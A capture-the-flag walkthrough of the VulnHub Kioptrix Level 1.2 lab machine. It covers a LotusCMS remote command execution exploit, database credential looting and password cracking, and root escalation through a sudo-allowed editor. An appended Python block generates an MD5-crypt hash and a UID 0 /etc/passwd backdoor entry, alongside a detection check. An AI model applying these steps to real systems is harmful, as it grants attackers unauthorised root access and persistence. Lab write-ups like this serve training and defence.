CTF Walkthroughs, VulnHub

VulnHub – Kioptrix: Level 1.2 Walkthrough

Introduction

This was an easy Linux box that involved exploiting a remote command execution vulnerability in the LotusCMS web application to gain initial access as www-data, cracking a user’s password hash recovered from the MySQL database to gain a user shell, and abusing a text editor that the user was allowed to run through sudo to escalate privileges to root.

Enumeration

The first thing to do is to run a TCP Nmap scan against the 1,000 most common ports, using the following flags:

  • -sC to run default scripts
  • -sV to enumerate applications versions
  • -oA to save the output in all formats available

The scan reveals that ports 22 (SSH) and 80 (HTTP) are open, so the next step is to enumerate the web server.

Enumerating HTTP

When accessing the web server via a browser, the following page is displayed:

Looking at the source code of the index.php page, nothing too interesting stands out, although it does mention “LotusCMS”, an open-source content management system:

The next step is to run a scan to find hidden files or directories using Gobuster, with the following flags:

  • dir to specify the scan should be done against directories and files
  • -k to skip TLS certificate verification
  • -u to specify the target URL
  • -w to specify the word list to use

This has not identified anything useful other than the /phpmyadmin directory, which is worth remembering in case database credentials turn up later.

A Nikto scan against the web application does not identify anything further either:

When looking for known vulnerabilities in LotusCMS, the following came up, from Exploit DB:

It seems to be a remote command execution vulnerability that can be easily exploited through a Metasploit module.

Exploiting Remote Command Execution

Starting msfconsole, searching for and selecting the LotusCMS exploit, then setting the following options and running it:

  • RHOST to specify the target host IP address
  • URI to specify the path to one of the web application’s pages

This has granted a Meterpreter shell as the www-data user.

Privilege Escalation

When enumerating the files in the users’ home directories, the Bash history for the “loneferret” user contains an unusual “sudo ht” entry:

This could be used to escalate privileges, as the history shows the command is run through sudo. The CompanyPolicy.README file contains more information about it; apparently, it is editing software used by the organization:

Upon doing some research, HT turns out to be a file viewer, editor and analyzer for text, binary and (especially) executable files. Unfortunately, it cannot be run through sudo as www-data, so a user account will be needed to investigate further. Since www-data has access to all of the web server files, the next step is to look for database credentials, starting with the “config.php” file, which usually contains MySQL credentials:

This reveals the password for the MySQL “root” user. Since phpMyAdmin is available, accessing the database is trivial. Logging into phpMyAdmin and browsing the tables reveals the password hash for the loneferret user:

Using the hashes.org online hash cracking/lookup tool to identify the clear-text password:

Logging into the box via SSH as loneferret with the newly discovered password and attempting to execute “sudo ht” produces an error related to the colours supported by the terminal:

After running the following command to set a terminal type that ht supports, the command runs:

export TERM=xterm

Since the HT editor runs as root, the current user can read and edit just about any file on the file system. One way to obtain root access is to add an extra line to the /etc/passwd file, creating an additional user with root privileges. Running the following command generates an MD5-crypt ($1$) password hash for the password “pass123”, using “user3” as the salt:

openssl passwd -1 -salt user3 pass123

Editing the /etc/passwd file with the HT editor and adding an extra line for the “user3” user, making sure to set the user ID to “0” so that the system treats it as root, and placing the previously generated hash in the password field instead of the “x” (so the entry is authenticated straight from /etc/passwd and /etc/shadow is never consulted), which allows logging in as that user with the password “pass123”:

Logging in as the “user3” user via SSH:

This has granted root access to the machine, as the UID of the new user is 0 (root).
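As an added example (not part of the original walkthrough), the following Python code reimplements the MD5-crypt ($1$) scheme that `openssl passwd -1 -salt user3 pass123` uses, builds the UID 0 /etc/passwd entry described above, and includes the check a defender would run to spot such an entry. The username “user3” and password “pass123” are the values from the walkthrough; the home directory and shell in the generated line are assumptions, and the standard library `crypt` module is deliberately avoided so the block runs stand-alone.

```python
import hashlib

# Alphabet crypt(3)-style hashes use for their base64-like output encoding.
_ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value: int, count: int) -> str:
    """Encode `count` 6-bit groups of `value`, least-significant group first."""
    out = []
    for _ in range(count):
        out.append(_ITOA64[value & 0x3F])
        value >>= 6
    return "".join(out)


def md5_crypt(password: str, salt: str) -> str:
    """Return the $1$ (MD5-crypt) hash of `password`, as `openssl passwd -1 -salt SALT` does.

    The salt is truncated to 8 characters, matching crypt(3).
    """
    pw = password.encode()
    salt_b = salt.encode()[:8]
    magic = b"$1$"

    # Intermediate digest of password+salt+password, mixed into the main context
    # once per 16 bytes of password length.
    alt = hashlib.md5(pw + salt_b + pw).digest()
    ctx = hashlib.md5(pw + magic + salt_b)
    for i in range(len(pw), 0, -16):
        ctx.update(alt[: min(16, i)])

    # For each bit of the password length, append a NUL byte (bit set)
    # or the first password byte (bit clear).
    i = len(pw)
    while i:
        ctx.update(b"\x00" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()

    # 1000 stretching rounds; each round feeds a different mix of password,
    # salt and the previous digest into a fresh MD5 context.
    for r in range(1000):
        ctx = hashlib.md5()
        ctx.update(pw if r & 1 else final)
        if r % 3:
            ctx.update(salt_b)
        if r % 7:
            ctx.update(pw)
        ctx.update(final if r & 1 else pw)
        final = ctx.digest()

    # The 16 digest bytes are interleaved into 22 output characters in crypt's fixed order.
    encoded = (
        _to64((final[0] << 16) | (final[6] << 8) | final[12], 4)
        + _to64((final[1] << 16) | (final[7] << 8) | final[13], 4)
        + _to64((final[2] << 16) | (final[8] << 8) | final[14], 4)
        + _to64((final[3] << 16) | (final[9] << 8) | final[15], 4)
        + _to64((final[4] << 16) | (final[10] << 8) | final[5], 4)
        + _to64(final[11], 2)
    )
    return f"$1${salt_b.decode()}${encoded}"


def passwd_line(user: str, password: str, salt: str,
                home: str = "/root", shell: str = "/bin/bash") -> str:
    """Build the /etc/passwd entry the walkthrough adds.

    UID 0 and GID 0 make the account root-equivalent; putting the hash in the
    second field instead of "x" means /etc/shadow is never consulted for it.
    `home` and `shell` are assumed values, not taken from the walkthrough.
    """
    return f"{user}:{md5_crypt(password, salt)}:0:0:{user}:{home}:{shell}"


def is_rogue_uid0_entry(line: str) -> bool:
    """Defender's check: True for a well-formed passwd line with UID 0 that is not 'root'."""
    fields = line.rstrip("\n").split(":")
    return len(fields) == 7 and fields[2] == "0" and fields[0] != "root"


if __name__ == "__main__":
    entry = passwd_line("user3", "pass123", "user3")
    print(entry)
    print("rogue UID 0 account:", is_rogue_uid0_entry(entry))
```

Auditing /etc/passwd for extra UID 0 entries (and for password fields that are not “x” or “*”) is a cheap detection for exactly this persistence trick, and is worth running alongside a review of sudoers rules that grant editors or other programs able to open arbitrary files.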

Conclusion

The exploitation part of this machine was quite trivial although I quite enjoyed the privilege escalation as it involved a text editor I had never seen before, and shows just how dangerous it can be to allow regular users to edit files as root, as it will pretty much always grant full system access to a potential attacker.